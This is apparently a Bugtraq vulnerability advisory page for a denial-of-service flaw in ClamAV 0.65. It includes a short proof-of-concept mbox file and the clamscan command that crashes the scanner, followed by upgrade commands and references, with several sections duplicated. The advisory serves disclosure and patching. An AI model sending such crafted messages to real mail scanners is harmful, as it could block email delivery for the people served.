ClamAV Daemon Malformed UUEncoded Message Denial Of Service Vulnerability
BID:9610
Info
ClamAV Daemon Malformed UUEncoded Message Denial Of Service Vulnerability
| Bugtraq ID: | 9610 |
| Class: | Failure to Handle Exceptional Conditions |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 09 2004 12:00AM |
| Updated: | Feb 09 2004 12:00AM |
| Credit: | Discovery credited to Oliver Eikemeier. |
| Vulnerable: |
Clam Anti-Virus ClamAV 0.65 |
| Not Vulnerable: |
Clam Anti-Virus ClamAV 0.67 |
Discussion
ClamAV Daemon Malformed UUEncoded Message Denial Of Service Vulnerability
A problem in the handling of specially crafted UUEncoded messages has been identified in ClamAV. Because of this, an attacker may prevent the delivery of e-mail to users.
A problem in the handling of specially crafted UUEncoded messages has been identified in ClamAV. Because of this, an attacker may prevent the delivery of e-mail to users.
Exploit / POC
ClamAV Daemon Malformed UUEncoded Message Denial Of Service Vulnerability
The following proof-of-concept has been made available by Oliver Eikemeier:
Save the following file to ~/clamtest.mbox:
From -
begin 644 byebye
byebye
end
Then do:
# clamscan --mbox -v ~/clamtest.mbox
assertion "(len >= 0) && (len <= 63)" failed: file "message.c", line 887
Abort (core dumped)
The following proof-of-concept has been made available by Oliver Eikemeier:
Save the following file to ~/clamtest.mbox:
From -
begin 644 byebye
byebye
end
Then do:
# clamscan --mbox -v ~/clamtest.mbox
assertion "(len >= 0) && (len <= 63)" failed: file "message.c", line 887
Abort (core dumped)
Solution / Fix
ClamAV Daemon Malformed UUEncoded Message Denial Of Service Vulnerability
Solution:
Gentoo has released an advisory that includes fixes to address this issue. These fixes can be applied with the following commands:
~ # emerge sync
~ # emerge -pv ">=net-mail/clamav-0.6.7"
~ # emerge ">=net-mail/clamav-0.6.7"
The vendor has released ClamAV 0.67 to address this issue.
Clam Anti-Virus ClamAV 0.65
Solution:
Gentoo has released an advisory that includes fixes to address this issue. These fixes can be applied with the following commands:
~ # emerge sync
~ # emerge -pv ">=net-mail/clamav-0.6.7"
~ # emerge ">=net-mail/clamav-0.6.7"
The vendor has released ClamAV 0.67 to address this issue.
Clam Anti-Virus ClamAV 0.65
-
Clam Anti-Virus clamav-0.67.tar.gz
http://prdownloads.sf.net/clamav/clamav-0.67.tar.gz
References
ClamAV Daemon Malformed UUEncoded Message Denial Of Service Vulnerability
References:
References:
- Problem Report ports/62586 (FreeBSD)
- Project Homepage (ClamAV)
- clamav 0.65 remote DOS exploit (Oliver Eikemeier
)